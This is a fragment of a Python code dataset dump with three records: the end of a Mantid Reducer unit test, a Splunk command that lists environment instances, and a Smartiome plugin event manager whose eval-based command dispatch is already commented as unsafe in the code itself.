r.append_step(ConvertToHistogram, None, None)\n \n r._reduction_steps[0].execute(r, \"test2\")\n\n r._reduction_steps[1].execute(r, \"test2\", \"test3\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n self.assertNotEqual(mtd[\"test3\"], None)\n mtd.deleteWorkspace(\"test2\")\n mtd.deleteWorkspace(\"test3\")\n \n def test_parameter_variation(self):\n \"\"\"\n Similar to previous test, but the algo function is passed as a string\n \"\"\"\n r = Reducer()\n r.append_step(\"LoadAscii\", \"AsciiExample.txt\", None)\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n mtd.deleteWorkspace(\"test2\")\n \n def test_reduction_step(self):\n \"\"\"\n Test that passing a ReductionStep object works \n \"\"\"\n r = Reducer()\n r.append_step(TestReductionStep())\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n self.assertEqual(result, 5)\n \n def test_decorator(self):\n \"\"\"\n Check that the decorator works for any method with a\n signature like func(reducer, algorithm)\n \"\"\"\n @validate_step\n def some_func(reducer, algorithm):\n self.assertTrue(issubclass(type(algorithm), ReductionStep))\n \n some_func(Reducer(), LoadAscii, \"AsciiExample.txt\", None)\n \n def test_bad_alg_name(self):\n r = Reducer()\n r.append_step(\"NotAnAlgorithm\")\n self.assertRaises(RuntimeError, r._reduction_steps[0].execute, (r, \"test\") )\n \n def test_data_files(self):\n r = Reducer()\n r.append_data_file(\"AsciiExample.txt\")\n \n # Check that we can empty the list of data files\n self.assertEqual(len(r._data_files), 1)\n r.clear_data_files()\n self.assertEqual(len(r._data_files), 0)\n\n def test_imports(self):\n import reduction_gui\n import reduction_application\n \n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Code/Mantid/scripts/test/ReducerTest.py","file_name":"ReducerTest.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188627893","text":"import sys\nimport json\nfrom splunklib.searchcommands import dispatch, GeneratingCommand, Configuration, Option\nfrom splunklib.searchcommands.validators import Boolean\n\n\n@Configuration(distributed=False, type='reporting')\nclass 
EnvironmentInstancesCommand(GeneratingCommand):\n\n    id = Option(require=True)\n\n    def generate(self):\n        body = str(self.service.get(\n            \"/services/msaas/environments/%s/instances\" % self.id)[\"body\"])\n        instances = json.loads(body)\n        for instance in instances:\n            yield instance\n\ndispatch(EnvironmentInstancesCommand, sys.argv,\n         sys.stdin, sys.stdout, __name__)\n","sub_path":"apps/msaas/bin/environment_instances_command.py","file_name":"environment_instances_command.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}{"seq_id":"488883427","text":"from Smartiome.Core.EventManager import *\nfrom queue import Queue, Empty\nfrom Smartiome.Auxillaries.SystemLogger import *\nimport threading\n\n\"\"\"\nGeneric Message Format:\n    data[\"target\"]: str(plugin_name)\n    data[\"source\"]: str(plugin_name)\n    (opt)data[\"recipient\"]: str(recipient_id)\n    data[\"content\"]: list(content or command)\n\"\"\"\n\nclass APIManager(object):\n    lock = threading.Lock()\n    lock.acquire()\n    PLUGINS = {}\n    PLUGINS_EVENTS_QUEUE = Queue()\n    logger = SystemLogger()\n\n    def __init__(self, EventManager):\n        self.EventManager = EventManager\n\n    def startWorkers(self):\n        for plu in self.PLUGINS.values():\n            plu.start_worker()\n\n    def ReadPluginsMessage(self):\n        print(\"Started\")\n        while True:\n            try:\n                event = self.PLUGINS_EVENTS_QUEUE.get(block=False)\n                # print(event)\n                self.SendMessage(event)\n            except Empty:\n                # NOTE: polling with block=False busy-spins; a blocking get() would be kinder to the CPU\n                pass\n\n    def ReadMessage(self, event):\n        \"\"\"\n        ReadMessage makes this object act as a listener\n        arg1: an event - type: Event()\n        \"\"\"\n        # print(event)\n        # self.PLUGINS[\"CommandLine\"].ReceiveMessage(self.PLUGINS, event.data, str_list=False)\n        if event.type_ == EType.DEFAULT:\n            # Enable DEFAULT Interfaces\n            if event.data[\"target\"] == \"revoke\":\n                self.cmdRevoke(event.data[\"cmd\"],\n                               event.data[\"plugin\"],\n                               event.data[\"args\"])\n            # print(event)\n            if event.data[\"target\"] in self.PLUGINS:\n                # print(\"yes\")\n                # self.PLUGINS[\"CommandLine\"]().ReceiveMessage()\n                self.PLUGINS[event.data[\"target\"]].ReceiveMessage(\n                    self.PLUGINS,\n                    event=event)\n            else:\n                self.logger.printError(\"Calling \"+event.data[\"target\"], target=\"APIManager\")\n            # else:\n            #     print(\"Not in the list of plugins\")\n\n            #for func in self.PLUGINS:\n            #    func().ReceiveMessage(self.PLUGINS,event., event.data, str_list=False)\n            #self.PLUGINS[\"CommandLine\"]()\\\n            #    .ReceiveMessage(self.PLUGINS, event.data, str_list=False)\n            #pass message back to plugins\n        pass\n\n    def SendMessage(self, event):\n        \"\"\"\n        SendMessage Method is for being an Event Source\n        arg1: Event(event)\n        \"\"\"\n        #print(event)\n        self.EventManager.SendEvent(event)\n\n\n    def cmdRevoke(self, cmd, plugin=\"\", args=[]):\n        \"\"\"\n        cmdRevoke invokes a method on the specified plugin object\n        arg1: string(cmd) the name of the method to invoke\n        arg2: string(plugin) the plugin that owns the method\n        arg3: args (need to implement)\n        \"\"\"\n        if not plugin:  # FIX: the original tested 'plugin is ()', which is never true for the default \"\"\n            print(\"No specified plugin\")\n            return\n        else:\n            # NOTE: assembling source strings for eval is fragile and unsafe; kept as in the original design\n            if args != []:\n                self.SendMessage(eval(\"self.PLUGINS[\\\"\"+plugin+\"\\\"]().\"+cmd+\"(self.PLUGINS, \"\n                                      + str(args)+\")\"))  # Send args as str\n                # self.PLUGINS[plugin]().cmd(args)  # broken direct call, kept for reference\n            else:\n                self.SendMessage(eval(\"self.PLUGINS[\\\"\"+plugin+\"\\\"]().\"+cmd+\"(self.PLUGINS\"\n                                      +\")\"))  # Send args as str\n\n    @classmethod\n    def plugin_register(cls, plugin_name):\n        def wrapper(plugin):\n            obj = object.__new__(plugin)\n            cls.PLUGINS.update({plugin_name:obj})
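\n            # object.__new__ creates the instance without running its constructor;\n            # __init__ is then called by hand with the shared event queue and logger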
\n            obj.__init__(cls.PLUGINS_EVENTS_QUEUE, cls.logger)\n            print(plugin_name+\" has been activated.\")\n            return obj\n        return wrapper\n","sub_path":"Smartiome/Core/APIManager.py","file_name":"APIManager.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
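# --- Editor's addition: hedged usage sketch for APIManager.plugin_register above ---
# Illustrative names only; assumes the APIManager class from the last record is
# importable. The decorator instantiates the class, hands it the shared queue and
# logger, and rebinds the name to that instance.
@APIManager.plugin_register("Echo")
class EchoPlugin:
    def __init__(self, events_queue, logger):
        # receives the class-level event queue and logger from the decorator
        self.events_queue = events_queue
        self.logger = logger

    def start_worker(self):
        # required by APIManager.startWorkers(); a real plugin would spawn a thread here
        pass

    def ReceiveMessage(self, plugins, event=None):
        # echo the event straight back onto the shared plugin queue
        self.events_queue.put(event)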